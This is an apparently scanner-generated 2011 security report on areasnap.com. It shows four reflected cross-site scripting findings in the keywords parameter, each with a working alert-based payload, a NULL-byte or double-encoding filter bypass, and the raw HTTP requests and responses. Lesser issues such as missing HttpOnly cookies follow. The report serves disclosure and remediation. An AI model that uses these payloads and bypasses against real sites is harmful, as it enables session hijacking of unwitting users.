XSS, Cross Site Scripting, areasnap.com, CWE-79, CAPEC-86

http://areasnap.com/?keywords=www.giga-blast.com%00e9d2a%3Cscript%3Ealert(document.cookie)%3C/script%3E1bfc2abf92b

Report generated by XSS.CX at Sun Mar 13 07:44:28 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Loading

1. Cross-site scripting (reflected)

1.1. http://areasnap.com/ [keywords parameter]

1.2. http://areasnap.com/ [keywords parameter]

1.3. http://areasnap.com/ [keywords parameter]

1.4. http://areasnap.com/ [keywords parameter]

2. Cross-domain Referer leakage

3. Cross-domain script include

4. Cookie without HttpOnly flag set

5. Robots.txt file



1. Cross-site scripting (reflected)  next
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://areasnap.com/ [keywords parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://areasnap.com
Path:   /

Issue detail

The value of the keywords request parameter is copied into the HTML document as plain text between tags. The payload %00e9d2a<script>alert(1)</script>1bfc2abf92b was submitted in the keywords parameter. This input was echoed as e9d2a<script>alert(1)</script>1bfc2abf92b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?keywords=www.giga-blast.com%00e9d2a<script>alert(1)</script>1bfc2abf92b HTTP/1.1
Host: areasnap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="CURa ADMa DEVa PSAo PSDo IVAo IVDo OUR BUS DSP NON COR"
X-AspNet-Version: 2.0.50727
Set-Cookie: il=0; path=/
Set-Cookie: OptVals=FEED=1&DEST=11&ABOPT=10&TEMPL=1508; path=/
Set-Cookie: clid=dom8af611ec044abb285d9f5e6e29692; expires=Wed, 10-Mar-2021 02:50:11 GMT; path=/
Set-Cookie: isp=softlayer ; expires=Sun, 27-Mar-2011 01:50:11 GMT; path=/
Set-Cookie: template=iframe_results_v1; path=/
Set-Cookie: keyword=www.giga-blast.com%00e9d2a<script>alert(1)</script>1bfc2abf92b; path=/
Set-Cookie: sid=77ee7500-fe2e-4579-9af1-9d6f9c9320b5; path=/
Set-Cookie: il=0; path=/
X-Powered-By: ASP.NET
Date: Sun, 13 Mar 2011 02:50:11 GMT
Connection: close
Content-Length: 21456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<span id="sq">www.giga-blast.com.e9d2a<script>alert(1)</script>1bfc2abf92b</span>
...[SNIP]...

1.2. http://areasnap.com/ [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://areasnap.com
Path:   /

Issue detail

The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload 25834</title><script>alert(1)</script>9a041883c73 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keywords=www.giga-blast.com25834</title><script>alert(1)</script>9a041883c73 HTTP/1.1
Host: areasnap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="CURa ADMa DEVa PSAo PSDo IVAo IVDo OUR BUS DSP NON COR"
X-AspNet-Version: 2.0.50727
Set-Cookie: il=0; path=/
Set-Cookie: OptVals=FEED=1&DEST=11&ABOPT=10&TEMPL=1508; path=/
Set-Cookie: clid=dom33293b8b74b0fb2cdad0b38b6879c; expires=Wed, 10-Mar-2021 02:50:14 GMT; path=/
Set-Cookie: isp=softlayer ; expires=Sun, 27-Mar-2011 01:50:14 GMT; path=/
Set-Cookie: template=iframe_results_v1; path=/
Set-Cookie: keyword=www.giga-blast.com25834</title><script>alert(1)</script>9a041883c73; path=/
Set-Cookie: sid=9c06cc5f-2fa5-436e-9712-e8aa5631bc9f; path=/
Set-Cookie: il=0; path=/
X-Powered-By: ASP.NET
Date: Sun, 13 Mar 2011 02:50:14 GMT
Connection: close
Content-Length: 23111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<title>Search Results for "www.giga-blast.com25834</title><script>alert(1)</script>9a041883c73"</title>
...[SNIP]...

1.3. http://areasnap.com/ [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://areasnap.com
Path:   /

Issue detail

The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b5c8%2527%253balert%25281%2529%252f%252f0d1e599f908 was submitted in the keywords parameter. This input was echoed as 9b5c8';alert(1)//0d1e599f908 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the keywords request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /?keywords=9b5c8%2527%253balert%25281%2529%252f%252f0d1e599f908 HTTP/1.1
Host: areasnap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="CURa ADMa DEVa PSAo PSDo IVAo IVDo OUR BUS DSP NON COR"
X-AspNet-Version: 2.0.50727
Set-Cookie: il=0; path=/
Set-Cookie: OptVals=FEED=1&DEST=11&ABOPT=10&TEMPL=1508; path=/
Set-Cookie: clid=dom4b139ffa74fb383fb0dbb57ed30d0; expires=Wed, 10-Mar-2021 02:50:06 GMT; path=/
Set-Cookie: isp=softlayer ; expires=Sun, 27-Mar-2011 01:50:06 GMT; path=/
Set-Cookie: template=iframe_results_v1; path=/
Set-Cookie: keyword=9b5c8';alert(1)//0d1e599f908; path=/
Set-Cookie: sid=3c96a589-ddd6-486a-bb8f-3999ea04f28e; path=/
Set-Cookie: il=0; path=/
X-Powered-By: ASP.NET
Date: Sun, 13 Mar 2011 02:50:06 GMT
Connection: close
Content-Length: 21420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
return x.replace(/^\s*|\s*$/g,"");
}
function stripIt(x){
if (x==null) { return ""; }
return x.replace(/['"]/g,'');
}
var sterm = "9b5c8';alert(1)//0d1e599f908";
var squery = trim(stripIt(escape(sterm)));
if(squery.length >
...[SNIP]...

1.4. http://areasnap.com/ [keywords parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://areasnap.com
Path:   /

Issue detail

The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %004fdd1"%3balert(1)//8310f028e5f was submitted in the keywords parameter. This input was echoed as 4fdd1";alert(1)//8310f028e5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?keywords=www.giga-blast.com%004fdd1"%3balert(1)//8310f028e5f HTTP/1.1
Host: areasnap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="CURa ADMa DEVa PSAo PSDo IVAo IVDo OUR BUS DSP NON COR"
X-AspNet-Version: 2.0.50727
Set-Cookie: il=0; path=/
Set-Cookie: OptVals=FEED=1&DEST=11&ABOPT=10&TEMPL=1508; path=/
Set-Cookie: clid=dom4b447e44f420bb982d3199071b5fe; expires=Wed, 10-Mar-2021 02:50:02 GMT; path=/
Set-Cookie: isp=softlayer ; expires=Sun, 27-Mar-2011 01:50:02 GMT; path=/
Set-Cookie: template=iframe_results_v1; path=/
Set-Cookie: keyword=www.giga-blast.com%004fdd1";alert(1)//8310f028e5f; path=/
Set-Cookie: sid=70219f2e-a4e7-4c23-b4bc-7cd8637606f6; path=/
Set-Cookie: il=0; path=/
X-Powered-By: ASP.NET
Date: Sun, 13 Mar 2011 02:50:02 GMT
Connection: close
Content-Length: 21417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<script type="text/javascript">
               var sq = "www.giga-blast.com.4fdd1";alert(1)//8310f028e5f";
               if (sq.length >
...[SNIP]...

2. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://areasnap.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /?keywords=www.giga-blast.com HTTP/1.1
Host: areasnap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="CURa ADMa DEVa PSAo PSDo IVAo IVDo OUR BUS DSP NON COR"
X-AspNet-Version: 2.0.50727
Set-Cookie: il=0; path=/
Set-Cookie: OptVals=FEED=1&DEST=11&ABOPT=10&TEMPL=1508; path=/
Set-Cookie: clid=dom39c486bce43369aa0854c312a534e; expires=Wed, 10-Mar-2021 02:49:51 GMT; path=/
Set-Cookie: isp=softlayer ; expires=Sun, 27-Mar-2011 01:49:51 GMT; path=/
Set-Cookie: template=iframe_results_v1; path=/
Set-Cookie: keyword=www.giga-blast.com; path=/
Set-Cookie: sid=e8e4eda3-6d43-45b6-9f6a-649b89f8fb3d; path=/
Set-Cookie: il=0; path=/
X-Powered-By: ASP.NET
Date: Sun, 13 Mar 2011 02:49:51 GMT
Connection: close
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</title>
<link href="http://cdn.firstlook.com/custom/images/master-ResetCSS.css" rel="stylesheet" type="text/css" />
<link href="http://cdn.firstlook.com/custom/images/master-GlobalResults.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://cdn.firstlook.com/custom/images/jquery.js"></script>
<script type="text/javascript" src="http://cdn.firstlook.com/custom/images/thickbox.js"></script>
<link href="http://cdn.firstlook.com/custom/images/thickbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript">
...[SNIP]...
</script>
<img src='http://cms.trafficmp.com/tpix.gif?clid=dom39c486bce43369aa0854c312a534e&sid=e8e4eda3-6d43-45b6-9f6a-649b89f8fb3d' width='1' height='1'/></body>
...[SNIP]...

3. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://areasnap.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET / HTTP/1.1
Host: areasnap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="CURa ADMa DEVa PSAo PSDo IVAo IVDo OUR BUS DSP NON COR"
X-AspNet-Version: 2.0.50727
Set-Cookie: il=0; path=/
Set-Cookie: OptVals=FEED=1&DEST=11&ABOPT=10&TEMPL=1508; path=/
Set-Cookie: clid=dom0d4d90ae143c7be0162fc0efe7f3a; expires=Wed, 10-Mar-2021 02:49:50 GMT; path=/
Set-Cookie: isp=softlayer ; expires=Sun, 27-Mar-2011 01:49:50 GMT; path=/
Set-Cookie: template=iframe_results_v1; path=/
Set-Cookie: keyword=areasnap.com; path=/
Set-Cookie: sid=e168fb7f-1ec3-487f-9061-8f2b48d43cbb; path=/
Set-Cookie: il=0; path=/
X-Powered-By: ASP.NET
Date: Sun, 13 Mar 2011 02:49:50 GMT
Connection: close
Content-Length: 19807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link href="http://cdn.firstlook.com/custom/images/master-GlobalResults.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://cdn.firstlook.com/custom/images/jquery.js"></script>
<script type="text/javascript" src="http://cdn.firstlook.com/custom/images/thickbox.js"></script>
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://areasnap.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET / HTTP/1.1
Host: areasnap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="CURa ADMa DEVa PSAo PSDo IVAo IVDo OUR BUS DSP NON COR"
X-AspNet-Version: 2.0.50727
Set-Cookie: il=0; path=/
Set-Cookie: OptVals=FEED=1&DEST=11&ABOPT=10&TEMPL=1508; path=/
Set-Cookie: clid=dom0d4d90ae143c7be0162fc0efe7f3a; expires=Wed, 10-Mar-2021 02:49:50 GMT; path=/
Set-Cookie: isp=softlayer ; expires=Sun, 27-Mar-2011 01:49:50 GMT; path=/
Set-Cookie: template=iframe_results_v1; path=/
Set-Cookie: keyword=areasnap.com; path=/
Set-Cookie: sid=e168fb7f-1ec3-487f-9061-8f2b48d43cbb; path=/
Set-Cookie: il=0; path=/
X-Powered-By: ASP.NET
Date: Sun, 13 Mar 2011 02:49:50 GMT
Connection: close
Content-Length: 19807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

5. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://areasnap.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: areasnap.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 08 Feb 2011 21:05:04 GMT
Accept-Ranges: bytes
ETag: "5c72aedbd3c7cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 13 Mar 2011 02:49:51 GMT
Connection: close
Content-Length: 594

...User-Agent: *
Disallow: /index.aspx?tmp=firstlook_domain_parking_agreement
Disallow: /index.aspx?tmp=firstlook_software_bundling_agreement
Disallow: /index.aspx?tmp=firstlook_software_bundling_a
...[SNIP]...

Report generated by XSS.CX at Sun Mar 13 07:44:28 CDT 2011.